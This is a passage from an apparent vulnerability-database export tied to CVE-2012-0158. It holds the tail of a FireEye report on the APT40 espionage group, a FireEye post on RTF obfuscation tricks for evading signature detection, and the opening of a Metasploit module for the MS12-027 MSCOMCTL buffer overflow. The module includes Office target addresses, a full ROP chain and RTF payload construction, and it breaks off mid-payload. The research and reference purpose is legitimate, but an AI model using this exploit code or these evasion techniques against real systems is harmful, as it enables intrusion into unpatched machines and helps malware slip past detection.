elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road Initiative. China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\n \nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\n \nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "modified": "2019-03-04T13:00:00", "published": "2019-03-04T13:00:00", "id": "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-17T14:44:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:53", "description": "", "published": "2012-04-25T00:00:00", "type": "packetstorm", "title": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0158"], "modified": "2012-04-25T00:00:00", "id": "PACKETSTORM:112176", "href": "https://packetstormsecurity.com/files/112176/MS12-027-MSCOMCTL-ActiveX-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS12-027 MSCOMCTL ActiveX Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious \nRTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited \nin the wild on April 2012. \n \nThis module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office \n2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses \n\"msgr3en.dll\", which will load after office got load, so the malicious file must \nbe loaded through \"File / Open\" to achieve exploitation. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-0158' ], \n[ 'OSVDB', '81125' ], \n[ 'BID', '52911' ], \n[ 'MSB', 'MS12-027' ], \n[ 'URL', 'http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html' ], \n[ 'URL', 'http://abysssec.com/files/The_Arashi.pdf' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # Stack adjustment # add esp, -3500, \n'Space' => 900, \n'BadChars' => \"\\x00\", \n'DisableNops' => true # no need \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# winword.exe v12.0.4518.1014 (No Service Pack) \n# winword.exe v12.0.6211.1000 (SP1) \n# winword.exe v12.0.6425.1000 (SP2) \n# winword.exe v12.0.6612.1000 (SP3) \n[ 'Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Offset' => 270, \n'Ret' => 0x27583c30, # jmp esp # MSCOMCTL.ocx 6.1.95.45 \n'Rop' => false \n} \n], \n# winword.exe v14.0.6024.1000 (SP1) \n[ 'Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English', \n{ \n'Ret' => 0x3F2CB9E1, # ret # msgr3en.dll \n'Rop' => true, \n'RopOffset' => 120 \n} \n], \n], \n'DisclosureDate' => 'Apr 10 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), \n], self.class) \nend \n \ndef stream(bytes) \nRex::Text.to_hex(bytes).gsub(\"\\\\x\", \"\") \nend \n \ndef junk(n=1) \ntmp = [] \nvalue = rand_text(4).unpack(\"L\")[0].to_i \nn.times { tmp << value } \nreturn tmp \nend \n \n# Ikazuchi ROP chain (msgr3en.dll) \n# Credits to Abysssec \n# http://abysssec.com/files/The_Arashi.pdf \ndef create_rop_chain \nrop_gadgets = [ \n0x3F2CB9E0, # POP ECX # RETN \n0x3F10115C, # HeapCreate() IAT = 3F10115C \n# EAX == HeapCreate() Address \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# Call HeapCreate() and Create a Executable Heap. After this call, EAX contain our Heap Address. \n0x3F39AFCF, # CALL EAX # RETN \n0x00040000, \n0x00010000, \n0x00000000, \n0x3F2CB9E0, # POP ECX # RETN \n0x00008000, # pop 0x00008000 into ECX \n# add ECX to EAX and instead of calling HeapAlloc, now EAX point to the RWX Heap \n0x3F39CB46, # ADD EAX,ECX # POP ESI # RETN \njunk, \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 into ECX, it is a writable address. \n# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;) \n0x3F2233CC, # MOV DWORD PTR DS:[ECX],EAX # RETN \n0x3F2D59DF, #POP EAX # ADD DWORD PTR DS:[EAX],ESP # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 into EAX , it is writable address with zero! \n# then we add ESP to the Zero which result in storing ESP into that address, \n# we need ESP address for copying shellcode ( which stores in Stack ), \n# and we have to get it dynamically at run-time, now with my tricky instruction, we have it! \n0x3F2F18CC, # POP EAX # RETN \n0x3F3B3DC4, # pop 0x3F3B3DC4 ( ESP address ) into EAX \n# makes ECX point to nearly offset of Stack. \n0x3F2B745E, # MOV ECX,DWORD PTR DS:[EAX] #RETN \n0x3F39795E, # POP EDX # RETN \n0x00000024, # pop 0x00000024 into EDX \n# add 0x24 to ECX ( Stack address ) \n0x3F39CB44, # ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN \njunk, \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n# mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location, \n# and the popping it into ESI ! now ESI point where shellcode stores in stack \n0x3F3A16DE, # MOV DWORD PTR DS:[ECX],EAX # XOR EAX,EAX # POP ESI # RETN \n# EAX = ECX \n0x3F398267, # MOV EAX,ECX # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# makes EDI = Our RWX Heap Address \n0x3F2B0A7C, # XCHG EAX,EDI # RETN 4 \n0x3F2CB9E0, # POP ECX # RETN \njunk, \n0x3F3B3DC0, # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX \n# makes EAX point to our RWX Heap \n0x3F389CA5, # MOV EAX,DWORD PTR DS:[ECX] # RETN \n# just skip some junks \n0x3F38BEFB, # ADD AL,58 # RETN \n0x3F2CB9E0, # POP ECX # RETN \n0x00000300, # pop 0x00000300 into ECX ( 0x300 * 4 = Copy lent ) \n# Copy shellcode from stack into RWX Heap \n0x3F3441B4, # REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] # POP EDI # POP ESI # RETN \njunk(2), # pop into edi # pop into esi \n0x3F39AFCF # CALL EAX # RETN \n].flatten.pack(\"V*\") \n \n# To avoid shellcode being corrupted in the stack before ret \nrop_gadgets << \"\\x90\" * target['RopOffset'] # make_nops doesn't have sense here \nreturn rop_gadgets \n \nend \n \ndef exploit \n \nret_address = stream([target.ret].pack(\"V\")) \n \nif target['Rop'] \nshellcode = stream(create_rop_chain) \nelse \n# To avoid shellcode being corrupted in the stack before ret \nshellcode = stream(make_nops(target['Offset'])) \nshellcode << stream(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string) \nshellcode << stream(make_nops(4)) \nend \nshellcode << stream(payload.encoded) \nwhile shellcode.length < 2378 \nshellcode += \"0\" \nend \n \ncontent = \"{\\\\rtf1\" \ncontent << \"{\\\\fonttbl{\\\\f0\\\\fnil\\\\fcharset0 Verdana;}}\" \ncontent << \"\\\\viewkind4\\\\uc1\\\\pard\\\\sb100\\\\sa100\\\\lang9\\\\f0\\\\fs22\\\\par\" \ncontent << \"\\\\pard\\\\sa200\\\\sl276\\\\slmult1\\\\lang9\\\\fs22\\\\par\" \ncontent << \"{\\\\object\\\\objocx\" \ncontent << \"{\\\\*\\\\objdata\" \ncontent << \"\\n\" \ncontent << \"01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000\" \ncontent << \"00000000000000000E0000\" \ncontent << \"\\n\" \ncontent << \"D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000\" \ncontent << \"00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF\" \ncontent << \"FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\" \ncontent << 